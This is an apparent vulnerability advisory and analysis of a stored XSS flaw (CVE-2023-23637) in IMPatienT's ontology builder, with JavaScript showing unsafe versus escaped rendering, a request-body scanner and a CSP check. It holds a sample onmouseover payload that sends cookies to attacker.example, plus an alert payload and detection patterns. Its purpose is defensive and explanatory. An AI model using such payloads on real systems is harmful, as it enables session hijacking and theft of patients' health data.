CVE-2023-23637 in IMPatienT
Summary
by MITRE • 01/18/2023
IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.
Analysis
by VulDB Data Team • 10/14/2025
CVE-2023-23637 affects IMPatienT versions before 1.5.2 and is a stored cross-site scripting flaw in the ontology builder. The handler for PATCH /modify_onto accepts certain text fields without validating them, and the application later emits the stored values into page markup without context-appropriate output encoding. Because the advisory describes the payload as an onmouseover handler, the stored value must end up inside an HTML tag or attribute rather than in a text node; a value written as a text node cannot create an event handler attribute.
The attack path is simple: an attacker who can submit a PATCH /modify_onto request places a value such as a closing quote followed by onmouseover="..." in one of the affected text fields, and the application stores it verbatim. The handler then fires whenever another user's pointer passes over the affected ontology element, so the script runs in that user's browser with that user's session. Typical follow-on abuse is session hijacking, credential capture through injected forms, and exfiltration of data the victim's session can read. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation).
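The mechanism above, as an added example that is not IMPatienT's own code: a stored label interpolated straight into a tag lets an onmouseover handler escape its attribute, while the same template with contextual escaping keeps the payload inert. The field name, the span markup, the rule of escaping and the attacker host attacker.example are assumptions for illustration; only the onmouseover vector comes from the advisory.

```javascript
// Added example (not IMPatienT code). The markup, the "label" field and the
// attacker host are assumptions; the onmouseover vector is from the advisory.

// Escape the characters that matter in both text and double-quoted-attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering: the stored field is dropped into an attribute and a text node as-is.
function renderNodeUnsafe(label) {
  return `<span class="onto-node" title="${label}">${label}</span>`;
}

// Hardened rendering: the same template with every interpolation escaped.
function renderNodeSafe(label) {
  const e = escapeHtml(label);
  return `<span class="onto-node" title="${e}">${e}</span>`;
}

// List attribute names in the opening tag of one element. This is only enough
// to show where the payload lands; it is not a general HTML parser.
function attributeNames(html) {
  const open = html.slice(0, html.indexOf('>'));
  const names = [];
  const re = /\s([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = re.exec(open)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed payload: closes the title attribute, then appends an event handler
// that would ship the victim's cookies to an attacker-controlled host.
const PAYLOAD = 'Muscle" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)';

// Render the payload both ways and report which attributes each tag ends up with.
function demo() {
  const unsafe = renderNodeUnsafe(PAYLOAD);
  const safe = renderNodeSafe(PAYLOAD);
  return {
    unsafeAttrs: attributeNames(unsafe), // ['class', 'title', 'onmouseover']
    safeAttrs: attributeNames(safe),     // ['class', 'title']
    unsafe,
    safe,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the unsafe output the browser sees a third attribute, onmouseover, and will run it; in the hardened output the quote and the handler are still visible in the title text but are data, not markup. Escaping must match the context the value lands in: attribute, text, URL and JavaScript contexts each need their own encoder, and template engines that auto-escape only help where auto-escaping has not been switched off for that field.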
The impact is worst in healthcare deployments, where IMPatienT processes Protected Health Information (PHI). Script running in a victim's browser can submit forged forms to capture credentials, read session tokens that are not marked HttpOnly, and, even when cookies are HttpOnly, call the application's own endpoints with the victim's session to pull patient records and send them elsewhere. Because the payload is stored, it fires for every user who views the affected element until it is removed, so a single injection can keep harvesting data for as long as it goes unnoticed. For a healthcare organisation this is a patient-privacy compromise and a likely HIPAA reportable event, with the financial and reputational consequences that follow.
Mitigation starts with upgrading IMPatienT to 1.5.2 or later, which validates the affected fields and encodes them on output. Beyond the patch, apply output encoding appropriate to each rendering context (attribute, text, URL), validate ontology field values server-side against the character set they actually need, and serve a Content Security Policy whose script-src omits 'unsafe-inline', since inline event handlers such as onmouseover are blocked only under that condition. Audit the existing ontology content for stored handlers, because patching does not clean payloads already in the database. On the monitoring side, alert on PATCH /modify_onto bodies that contain event-handler attributes, script tags or javascript: URLs, treating that as a signal to investigate rather than as a substitute for encoding, since pattern denylists are bypassable. The case is a reminder that applications handling sensitive data need defence in depth and secure coding review across all user-controlled fields, not only the one named in this advisory.
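The detection and CSP checks described above, as an added example that is not IMPatienT's own code: a scan over constructed PATCH /modify_onto request bodies that flags inline event handlers, script tags and javascript: URLs, plus a check that a CSP's script-src actually refuses inline handlers. The request log, the field names node_id, label and description, and the two policy strings are constructed for illustration.

```javascript
// Added example (not IMPatienT code). The request log, field names and
// CSP strings below are constructed; only the endpoint and the onmouseover
// vector come from the advisory.

// Patterns that should never appear in a plain-text ontology field.
// A match is an investigation signal, not proof of exploitation, and a
// denylist like this is bypassable, so it complements output encoding.
const SUSPICIOUS = [
  { name: 'inline-event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'javascript-url', re: /javascript\s*:/i },
];

// Walk a parsed JSON body and return [{path, rule}] for every string that matches.
function scanBody(value, path = '$') {
  const hits = [];
  if (typeof value === 'string') {
    for (const { name, re } of SUSPICIOUS) {
      if (re.test(value)) hits.push({ path, rule: name });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...scanBody(v, `${path}[${i}]`)));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) hits.push(...scanBody(v, `${path}.${k}`));
  }
  return hits;
}

// Constructed request log: method, path and the JSON body each request carried.
const REQUESTS = [
  { method: 'PATCH', path: '/modify_onto',
    body: { node_id: 12, label: 'Myopathy', description: 'Primary muscle disease' } },
  { method: 'PATCH', path: '/modify_onto',
    body: { node_id: 12, label: 'x" onmouseover="alert(document.domain)', description: '' } },
  { method: 'PATCH', path: '/modify_onto',
    body: { node_id: 7, label: 'Link', description: '<a href="javascript:void(0)">x</a>' } },
  { method: 'GET', path: '/modify_onto', body: null },
];

// Return [{i, hits}] for each PATCH /modify_onto request whose body triggers a rule.
function flaggedRequests(requests) {
  return requests
    .map((r, i) => ({
      i,
      hits: r.method === 'PATCH' && r.path === '/modify_onto' ? scanBody(r.body) : [],
    }))
    .filter((x) => x.hits.length > 0);
}

// Two policies: the hardened one has no 'unsafe-inline' in script-src, so an
// onmouseover attribute that reaches the page is refused by the browser.
const CSP_HARDENED = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
const CSP_WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline'";

// True when the effective script directive still permits inline handlers.
function allowsInlineHandlers(csp) {
  const directives = csp.split(';').map((d) => d.trim());
  const script = directives.find((d) => d.startsWith('script-src'))
    || directives.find((d) => d.startsWith('default-src'))
    || '';
  return /'unsafe-inline'|'unsafe-hashes'/.test(script);
}

console.log(JSON.stringify(flaggedRequests(REQUESTS), null, 2)); // flags requests 1 and 2
console.log('weak CSP allows inline handlers:', allowsInlineHandlers(CSP_WEAK));
console.log('hardened CSP allows inline handlers:', allowsInlineHandlers(CSP_HARDENED));
```

Run the same scanBody over rows already in the ontology table to find payloads stored before the upgrade; the request-log pass only catches new attempts. Note that a CSP with a nonce or hash still counts as hardened only if 'unsafe-inline' is absent from script-src, because inline event handler attributes cannot carry a nonce.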